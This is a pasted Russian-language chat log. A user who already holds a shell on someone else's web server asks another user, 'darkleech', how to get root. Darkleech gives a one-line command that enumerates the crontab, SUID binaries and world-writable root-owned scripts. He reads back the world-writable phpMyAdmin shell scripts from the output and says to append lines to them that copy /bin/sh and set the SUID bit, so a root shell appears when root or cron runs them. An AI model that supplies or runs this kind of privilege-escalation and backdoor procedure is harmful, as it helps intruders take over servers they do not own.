Advertisement
Guest User

Untitled

a guest
Sep 28th, 2012
436
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.72 KB | None | 0 0
  1. darkleech@thesecure.biz
  2. 17:26 отходил
  3. 17:28 это нерутабельное ядро. Можно попробовать другими путями. Какие права у тебя там? Юзера или Апача? Это шаред хостинг или отдельный сервер какого-то чувака?
  4. Дай команду:
  5.  
  6. uname -a; cat /etc/crontab; ls -lia --full-time /etc/cron* /lib; find / -type f -perm -u+s -exec ls -lia {} \; 2>/dev/null; find / -type f -name "*.sh" -user root -perm -o+rw -exec ls -la {} \; 2>/dev/null
  7.  
  8. JustFive
  9. 17:31 привет
  10. 17:31 ты до этого общался
  11. 17:31 с моим партнером
  12. 17:31 он тебе писал
  13. darkleech@thesecure.biz
  14. 17:31 привет
  15. 17:31 ок
  16.  
  17. JustFive
  18. 17:32 по поводу
  19. 17:32 сервера
  20. 17:32 где есть шелл
  21. 17:32 и нужно получить рут
  22. 17:32 ?
  23. darkleech@thesecure.biz
  24. 17:32 да
  25.  
  26. JustFive
  27. 17:32 Linux www. 2.6.32-el-smp-alt27 #1 SMP Tue Sep 20 19:38:45 UTC 2011 x86_64
  28. 17:33 это ядро
  29. 17:33 ?
  30. darkleech@thesecure.biz
  31. 17:33 это нерутабельное ядро. Можно попробовать другими путями. Какие права у тебя там? Юзера или Апача? Это шаред хостинг или отдельный сервер какого-то чувака?
  32. Дай команду:
  33.  
  34. uname -a; cat /etc/crontab; ls -lia --full-time /etc/cron* /lib; find / -type f -perm -u+s -exec ls -lia {} \; 2>/dev/null; find / -type f -name "*.sh" -user root -perm -o+rw -exec ls -la {} \; 2>/dev/null
  35.  
  36. JustFive
  37. 17:35 http://pastebin.com/AR9KAjSi
  38. darkleech@thesecure.biz
  39. 17:39 -rwxrwxrwx 1 root root 885 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/generator.sh
  40. -rwxrwxrwx 1 root root 666 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/template_generator.sh
  41. -rwxrwxrwx 1 root root 546 Aug 9 2009 /var/www/apache2/adapted/phpmy/libraries/transformations/template_generator_mimetype.sh
  42. -rwxrwxrwx 1 root root 1269 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/find_unused_messages.sh
  43. -rwxrwxrwx 1 root root 415 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/remove_control_m.sh
  44. -rwxrwxrwx 1 root root 5873 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/create-release.sh
  45. -rwxrwxrwx 1 root root 2201 Aug 9 2009 /var/www/apache2/adapted/phpmy/scripts/lang-cleanup.sh
  46. -rwxrwxrwx 1 root root 795 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/add_message.sh
  47. -rwxrwxrwx 1 root root 1633 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/check_lang.sh
  48. -rwxrwxrwx 1 root root 2092 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/sort_lang.sh
  49. -rwxrwxrwx 1 root root 564 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/remove_message.sh
  50. -rwxrwxrwx 1 root root 931 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/translatecount.sh
  51. -rwxrwxrwx 1 root root 798 Aug 9 2009 /var/www/apache2/adapted/phpmy/lang/add_message_file.sh
  52.  
  53. вот эти все файлы доступны к редактированию и есть вероятность, что их запускает рут, можно вписать к каждому в конце
  54. cp /bin/sh /bin/sh2; chmod +s /bin/sh2
  55. и когда рут запустит - получится суидный рутовый шелл /bin/sh2
  56.  
  57. 17:39 а что выводит
  58. cat /etc/crontab 2>&1
  59. 17:39 ?
  60.  
  61. JustFive
  62. 17:39 нет прав
  63. darkleech@thesecure.biz
  64. 17:39 а точно
  65. 17:39 завтыкал
  66. 17:40 тогда единственный вариант править эти файлы в надежде что рут их запустит или по крону запускает
  67.  
  68. JustFive
  69. 17:40 а если прописать
  70. 17:40 и в ребут кинуть
  71. 17:40 или прав нет
  72. 17:40 что бы в ребут кинуть
  73. 17:40 ?
  74. darkleech@thesecure.biz
  75. 17:40 в ребут не получится
  76.  
  77. JustFive
  78. 17:42 хм ладно
  79. 17:42 спасибо
  80. darkleech@thesecure.biz
  81. 17:42 пожалуйста
  82.  
  83. JustFive
  84. 17:42 а этож май админ да?
  85. 17:42 или что это за файлы
  86. darkleech@thesecure.biz
  87. 17:42 по названию похоже на него
  88.  
  89. JustFive
  90. 17:43 а как его заюзать после запуска
  91. 17:43 или посмотреть что команда запустилась
  92. 17:43 ?
  93. darkleech@thesecure.biz
  94. 17:43 если его рут или рутовый крон запустит, то появится файл /bin/sh2 - его запускаешь и ты рут
  95.  
  96. JustFive
  97. 17:47 а понял спасибо
  98. 17:47 будем править
  99. darkleech@thesecure.biz
  100. 17:48 ok
  101. 18:06 Вы подключились
  102. 18:50 darkleech@thesecure.biz отошел
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement